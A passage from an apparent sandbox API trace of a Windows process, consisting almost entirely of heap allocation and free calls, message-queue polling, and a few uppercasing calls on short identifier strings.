(HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0215.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0215.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0215.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0215.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.527] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.527] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0215.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0215.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0215.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0215.527] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0215.528] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0215.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0215.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0215.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0215.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.528] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0215.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0215.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0215.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.529] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0215.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0215.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.529] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0215.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0215.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0215.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0215.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.531] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0215.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.531] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.531] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0215.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0215.532] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0215.532] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0215.532] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0215.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab800 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a742c8 [0215.532] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0215.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0215.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0215.533] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0215.533] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0215.533] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a742c8 | out: hHeap=0x2af0000) returned 1 [0215.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0215.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0215.534] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0215.534] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.534] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0215.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8f0 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73aa0 [0215.534] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0215.535] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | 